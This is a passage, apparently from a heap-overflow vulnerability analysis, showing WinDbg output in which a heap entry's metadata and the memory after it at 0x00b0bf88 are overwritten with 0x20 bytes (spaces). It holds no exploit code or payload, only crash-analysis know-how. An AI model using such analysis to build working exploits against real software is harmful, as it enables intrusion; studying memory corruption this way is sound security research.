   +0x004 SmallTagIndex: 0x20 ' '
   +0x005 Flags: 0x20 ' '
   +0x006 UnusedBytes: 0x20 ' '
   +0x007 SegmentIndex : 0x20 ' '
  
  From above windbg output, it can be seen that metadata of 0x00b0bf88is completely corrupted and overwritten with 0x20s which is nothing but spaces.
  
  0:000> dd 00b0bf88
  00b0bf8820202020 20202020 20202020 20202020
  00b0bf9820202020 20202020 20202020 20202020
  00b0bfa820202020 20202020 20202020 20202020
  00b0bfb820202020 20202020 20202020 20202020
  00b0bfc820202020 20202020 20202020 20202020
  00b0bfd820202020 20202020 20202020 20202020
  00b0bfe820202020 20202020 20202020 20202020
  00b0bff820202020 20202020 20202020 20202020